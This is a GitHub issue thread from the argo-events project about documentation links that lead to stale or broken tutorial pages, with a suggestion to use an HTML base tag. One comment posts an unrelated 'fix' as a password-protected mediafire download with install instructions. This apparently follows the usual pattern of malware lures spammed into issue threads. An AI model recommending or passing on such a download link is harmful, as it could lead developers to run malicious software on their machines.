### ISSUE TITLE
404 / stale doc links experience bad (^_-)

### ISSUE THREAD

**Issue by sparecycles** [argoproj/argo-events#3262]
**Describe the bug**
We have files with links to old documentation pages: e.g.,
https://argoproj.github.io/argo-events/tutorials/07-filters/

**To Reproduce**
1. Go to https://argoproj.github.io/argo-events/tutorials/07-filters/
2. Look at it.  Scroll down.  Look at it more?
3. 🙈 

**Expected behavior**
Not that?

(Does [`<base>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/base) still work in 2024?  Maybe we can slap that into the `<head>`?)

**Screenshots**
<img width="1171" alt="image" src="https://github.com/user-attachments/assets/5d273dfb-b675-48c1-b7c9-844eced0c91b">

---

**Message from the maintainers**:

If you wish to see this enhancement implemented please add a 👍 reaction to this issue! We often sort issues this way to know what to prioritize.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by OneCricketeer** [comment]
Relates to #1508
